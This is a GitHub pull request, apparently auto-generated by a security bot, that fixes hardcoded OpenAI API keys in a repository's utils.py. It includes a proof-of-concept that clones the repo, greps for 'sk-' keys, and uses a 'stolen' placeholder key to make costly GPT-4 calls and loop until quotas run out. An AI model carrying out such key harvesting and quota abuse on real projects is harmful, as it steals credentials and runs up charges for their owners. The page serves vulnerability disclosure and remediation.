[Security] Fix CRITICAL vulnerability: V-001 #81

orbisai0security · 2026-01-26T04:49:59Z

Security Fix

This PR addresses a CRITICAL severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect	Rating	Rationale
Impact	Critical	In this repository, the hardcoded OpenAI API keys in pageindex/utils.py allow attackers with access to the code to directly use the keys for unlimited API calls, potentially incurring massive charges on the associated account, exfiltrating sensitive data from API interactions, or disrupting services through quota exhaustion, leading to financial ruin and data breaches for the repository owner.
Likelihood	High	As a public GitHub repository, the hardcoded keys are visible to anyone who views or clones the code, making exploitation trivial for opportunistic attackers or automated scanners; the repository's focus on AI indexing with OpenAI integration increases motivation for attackers seeking free API access or to cause harm.
Ease of Fix	Easy	Remediation involves simply replacing the hardcoded strings with environment variable references (e.g., using os.environ) in utils.py, requiring no changes to dependencies or architecture, and minimal testing to ensure the variables are loaded correctly.

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in this repository involves hardcoded OpenAI API keys directly embedded in the source code of pageindex/utils.py, making them easily extractable by anyone with access to the repository (e.g., via GitHub cloning). An attacker can retrieve these keys and use them to authenticate with OpenAI's API, bypassing any intended access controls and performing actions on behalf of the repository owner. This enables unauthorized consumption of API credits, potential data exfiltration from AI-generated responses, or disruption of the repository's intended functionality if quotas are exhausted.

# Step 1: Clone the public repository to access the source code
git clone https://github.com/VectifyAI/PageIndex.git
cd PageIndex

# Step 2: Extract the hardcoded API keys from pageindex/utils.py
# The keys are at lines 20, 29, and 31 (as per the vulnerability report)
grep -n "sk-" pageindex/utils.py  # Search for OpenAI key patterns (typically start with 'sk-')
# Output example (actual keys would be visible in the file):
# 20:openai_api_key = "sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
# 29:api_key = "sk-YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY"
# 31:OPENAI_API_KEY = "sk-ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"

# Step 3: Save one of the extracted keys for use (e.g., copy to a variable)
# In a real attack, the attacker would note these keys for external use
export STOLEN_API_KEY="sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  # Replace with actual key from file

# Step 4: Use the stolen API key to make unauthorized OpenAI API calls
# This demonstrates exploiting the key for cost-incurring operations or data exfiltration
import openai

# Set the stolen key as the API key
openai.api_key = "sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  # Replace with actual stolen key

# Example exploit: Make a costly API call (e.g., generate text with high token usage)
# This could be repeated to exhaust quotas or incur charges
response = openai.ChatCompletion.create(
    model="gpt-4",  # Expensive model to maximize cost
    messages=[
        {"role": "user", "content": "Generate a 1000-word essay on cybersecurity vulnerabilities."}
    ],
    max_tokens=2000  # High token limit to increase cost
)

# Print the response (in a real attack, this could exfiltrate sensitive data if the app processes it)
print(response.choices[0].message.content)

# Additional exploit: Check API usage/quota to confirm access
usage = openai.Usage.retrieve()  # This might require billing access, but demonstrates control
print(usage)

# To disrupt: Loop to exhaust rate limits or quotas
for i in range(100):  # Adjust to hit limits
    openai.ChatCompletion.create(
        model="gpt-4",
        messages=[{"role": "user", "content": f"Query {i}: Explain AI security."}],
        max_tokens=500
    )

Exploitation Impact Assessment

Impact Category	Severity	Description
Data Exposure	Medium	If the PageIndex tool processes sensitive user data (e.g., web page content containing personal information or proprietary text), an attacker could exfiltrate it through API responses by crafting prompts that echo input data. However, exposure is limited to data flowing through OpenAI's API during indexing operations, not direct access to stored data in the repository.
System Compromise	Low	No direct system access is gained; the exploit is limited to external API abuse. An attacker cannot execute code on the repository's servers or gain privileges, as the keys only enable API interactions, not host-level control.
Operational Impact	High	Successful exploitation could exhaust OpenAI API quotas, halting the repository's page indexing functionality and causing service disruption for users relying on it. Unlimited API charges could financially impact the repository owner, potentially leading to account suspension or bankruptcy if costs spiral (e.g., thousands of dollars from repeated high-token queries).
Compliance Risk	High	Violates OWASP API Security Top 10 (A2: Broken Authentication) by exposing credentials, and could breach GDPR if user data is processed without consent. Fails industry standards like SOC2 for secure credential management, risking audits and legal penalties for unauthorized data handling or financial losses.

Vulnerability Details

Rule ID: V-001
File: pageindex/utils.py
Description: The pageindex/utils.py file contains hardcoded API key references at lines 20, 29, and 31. Hardcoded API keys represent the most critical vulnerability as they provide immediate, unrestricted access to external services. With the openai dependency present, these credentials likely provide access to OpenAI's API services, enabling attackers to incur unlimited charges, exfiltrate data from API interactions, or cause service disruption through quota exhaustion.

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

pageindex/utils.py

Verification

This fix has been automatically verified through:

✅ Build verification
✅ Scanner re-scan
✅ LLM code review

🤖 This PR was automatically generated.

Automatically generated security fix

fix: resolve critical vulnerability V-001

19aab06

Automatically generated security fix

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] Fix CRITICAL vulnerability: V-001 #81

[Security] Fix CRITICAL vulnerability: V-001 #81

Uh oh!

orbisai0security commented Jan 26, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

[Security] Fix CRITICAL vulnerability: V-001 #81

Are you sure you want to change the base?

[Security] Fix CRITICAL vulnerability: V-001 #81

Uh oh!

Conversation

orbisai0security commented Jan 26, 2026

Security Fix

Security Impact Assessment

Evidence: Proof-of-Concept Exploitation Demo

How This Vulnerability Can Be Exploited

Exploitation Impact Assessment

Vulnerability Details

Changes Made

Files Modified

Verification

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant